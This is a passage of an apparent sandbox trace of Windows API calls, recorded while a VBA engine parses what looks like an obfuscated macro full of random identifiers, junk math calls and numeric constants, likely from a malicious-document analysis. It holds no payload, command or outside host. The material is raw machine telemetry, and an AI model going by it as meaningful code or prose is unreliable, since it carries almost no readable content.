plOut=0x7fee3b5ea10) returned 0x0 [0067.850] VarI4FromStr (in: strIn="251785288", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.850] VarI4FromStr (in: strIn="788846071", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.851] VarI4FromStr (in: strIn="350100362", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.851] VarI4FromStr (in: strIn="21746315", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.851] VarI4FromStr (in: strIn="542006650", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.851] VarI4FromStr (in: strIn="740435402", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.851] VarI4FromStr (in: strIn="620464685", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.851] VarI4FromStr (in: strIn="344316132", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.851] VarI4FromStr (in: strIn="918665773", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.851] VarI4FromStr (in: strIn="26641573", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.851] VarI4FromStr (in: strIn="897904731", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.851] VarI4FromStr (in: strIn="272328792", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.851] VarI4FromStr (in: strIn="845688777", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.851] VarI4FromStr (in: strIn="81792900", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.851] VarI4FromStr (in: strIn="453252155", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.851] VarI4FromStr (in: strIn="829838060", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.851] VarI4FromStr (in: strIn="710330367", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.851] VarI4FromStr (in: strIn="227068446", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.851] VarI4FromStr (in: strIn="681638491", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.851] VarI4FromStr (in: strIn="397235431", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.851] VarI4FromStr (in: strIn="778909076", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.852] IMalloc:Realloc (This=0x7fefec05380, pv=0xafc2e20, cb=0x4800) returned 0xafc5230 [0067.852] strcpy_s (in: _Dst=0x7fee3b5efc0, _DstSize=0x100, _Src="SAAAAGQ" | out: _Dst="SAAAAGQ") returned 0x0 [0067.852] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf54180, cb=0x200) returned 0x64fcbb0 [0067.853] VarI4FromStr (in: strIn="907645097", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.853] VarI4FromStr (in: strIn="912919200", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.853] VarI4FromStr (in: strIn="900976087", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.853] VarI4FromStr (in: strIn="917484411", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.853] VarI4FromStr (in: strIn="249929219", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.853] VarI4FromStr (in: strIn="711125973", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.853] VarI4FromStr (in: strIn="647701415", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.853] VarI4FromStr (in: strIn="199186697", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.853] VarI4FromStr (in: strIn="112232853", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.853] VarI4FromStr (in: strIn="845933619", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.853] VarI4FromStr (in: strIn="332962268", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.853] VarI4FromStr (in: strIn="905867479", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.853] VarI4FromStr (in: strIn="576719946", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.853] VarI4FromStr (in: strIn="626559992", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.853] VarI4FromStr (in: strIn="803877251", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.853] VarI4FromStr (in: strIn="477671003", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.853] VarI4FromStr (in: strIn="752095128", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.853] VarI4FromStr (in: strIn="332300114", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.853] VarI4FromStr (in: strIn="430741079", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.853] VarI4FromStr (in: strIn="402035209", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.854] VarI4FromStr (in: strIn="145498840", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.854] VarI4FromStr (in: strIn="263139168", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.854] VarI4FromStr (in: strIn="92813033", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.854] VarI4FromStr (in: strIn="477455660", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.854] VarI4FromStr (in: strIn="555772847", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.854] VarI4FromStr (in: strIn="80923369", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.854] VarI4FromStr (in: strIn="529644389", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.854] VarI4FromStr (in: strIn="830909065", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.854] VarI4FromStr (in: strIn="645865639", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.854] VarI4FromStr (in: strIn="138293014", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.854] VarI4FromStr (in: strIn="50749781", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.854] VarI4FromStr (in: strIn="63899457", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.854] VarI4FromStr (in: strIn="352149858", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.854] VarI4FromStr (in: strIn="678384638", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.854] VarI4FromStr (in: strIn="465622524", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.854] VarI4FromStr (in: strIn="211355636", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.854] VarI4FromStr (in: strIn="509247598", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.854] VarI4FromStr (in: strIn="239908426", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.854] VarI4FromStr (in: strIn="762994036", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.854] CExposedStream::Read () returned 0x0 [0067.855] CExposedStream::Read () returned 0x0 [0067.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.855] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GXBAA4") returned 0x10c03e [0067.855] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.855] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.855] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.855] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mADoko") returned 0x1003f2 [0067.855] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GAAxGAA") returned 0x10e4f8 [0067.855] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.855] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bQ4QAAU") returned 0x102844 [0067.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.855] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wAAkBA") returned 0x106880 [0067.855] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ixADUo") returned 0x103ad7 [0067.855] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="d1oUAwDc") returned 0x10aec1 [0067.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.855] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nGBGAAA") returned 0x1074ef [0067.855] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="ByRef", cchCount1=-1, lpString2="nGBGAAA", cchCount2=-1) returned 1 [0067.855] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.855] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Y1kUXA") returned 0x102483 [0067.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0067.855] VarI4FromStr (in: strIn="68939835", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.856] VarI4FromStr (in: strIn="751010776", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.856] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.856] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JUAAAA") returned 0x1088e7 [0067.856] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.856] VarI4FromStr (in: strIn="51999901", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.856] VarI4FromStr (in: strIn="353480108", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.856] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.856] VarI4FromStr (in: strIn="657623456", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.856] VarI4FromStr (in: strIn="327222665", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.856] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.856] VarI4FromStr (in: strIn="64909927", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.856] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Z4GGkXA") returned 0x10c5c4 [0067.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.856] VarI4FromStr (in: strIn="129110912", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.856] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kABkGQ1A") returned 0x103ad1 [0067.856] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.856] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.856] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lGA_4A_") returned 0x10a663 [0067.856] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.856] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iQAU4BU") returned 0x101900 [0067.856] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fAwwAk4k") returned 0x1080c8 [0067.856] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.856] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mACC1AA") returned 0x10daa0 [0067.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.856] VarI4FromStr (in: strIn="364985244", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.856] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="l4D_AU") returned 0x10d8af [0067.857] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JD4AkDU1") returned 0x10e6f4 [0067.857] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bAZAAw") returned 0x10bb24 [0067.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.857] VarI4FromStr (in: strIn="313685682", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.857] VarI4FromStr (in: strIn="158315496", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.857] VarI4FromStr (in: strIn="709073353", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.857] VarI4FromStr (in: strIn="578584485", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.857] VarI4FromStr (in: strIn="867494515", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.857] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZAAAcQQ") returned 0x10b384 [0067.857] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.857] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DAAAx_14") returned 0x10e747 [0067.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.857] VarI4FromStr (in: strIn="550232107", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.857] VarI4FromStr (in: strIn="12257109", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.857] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.857] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rAUQoA") returned 0x10a132 [0067.857] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.857] VarI4FromStr (in: strIn="143179005", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.857] VarI4FromStr (in: strIn="271113663", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.857] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.857] VarI4FromStr (in: strIn="2990596", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.857] VarI4FromStr (in: strIn="478685149", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.857] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.857] VarI4FromStr (in: strIn="832994535", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.857] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GDoXAZ") returned 0x10ded7 [0067.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.857] VarI4FromStr (in: strIn="250387384", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.858] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EBxDwBBk") returned 0x10bbbf [0067.858] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.858] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.858] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.858] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EAAA4AGA") returned 0x107e8c [0067.858] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HDAUUADB") returned 0x10096d [0067.858] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.858] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="T1AA4414") returned 0x104398 [0067.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.858] VarI4FromStr (in: strIn="540303637", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.858] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cADBBA") returned 0x10da74 [0067.858] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zX1A1D") returned 0x104c88 [0067.858] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oCADADG") returned 0x106fb5 [0067.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.858] VarI4FromStr (in: strIn="467408078", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.858] VarI4FromStr (in: strIn="789260021", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.858] VarI4FromStr (in: strIn="720224775", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.858] VarI4FromStr (in: strIn="588810262", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.858] VarI4FromStr (in: strIn="804154707", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.858] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DQkGB_") returned 0x10922f [0067.858] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.858] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="boAABZDG") returned 0x103e27 [0067.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.858] VarI4FromStr (in: strIn="629807590", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.858] VarI4FromStr (in: strIn="395329549", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.858] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.858] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aAkAcZ") returned 0x100f7e [0067.858] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0067.859] VarI4FromStr (in: strIn="984719520", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.859] VarI4FromStr (in: strIn="894704477", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.859] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Oct") returned 0x10bdc0 [0067.859] VarI4FromStr (in: strIn="54635738", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.859] VarI4FromStr (in: strIn="135555344", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.859] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sqr") returned 0x10d528 [0067.859] VarI4FromStr (in: strIn="849797239", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.859] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wDQZ4Q") returned 0x10c746 [0067.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.859] VarI4FromStr (in: strIn="964296706", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.859] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WQXBAAUk") returned 0x10ef78 [0067.859] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.859] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.859] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wZAGZGD") returned 0x1006fd [0067.859] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.859] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tADQQUUU") returned 0x109d8b [0067.859] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zAAAAA") returned 0x108db9 [0067.859] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.859] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sxGccDA") returned 0x10fbc7 [0067.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0067.859] VarI4FromStr (in: strIn="172242835", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.859] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mcUABcA") returned 0x100a78 [0067.859] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dccAAA") returned 0x1049aa [0067.859] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jXZDAUA") returned 0x105754 [0067.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.860] VarI4FromStr (in: strIn="1600777", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.860] VarI4FromStr (in: strIn="620006733", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.860] VarI4FromStr (in: strIn="224980739", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.860] VarI4FromStr (in: strIn="898778840", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.860] VarI4FromStr (in: strIn="374686401", lcid=0x409, dwFlags=0x80000000, plOut=0x7fee3b5ea10 | out: plOut=0x7fee3b5ea10) returned 0x0 [0067.860] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="fA1CAGA") returned 0x1037e6 [0067.860] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tan") returned 0x10d82d [0067.860] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IAAQUocZ") returned 0x1055be [0067.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3b5eba0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 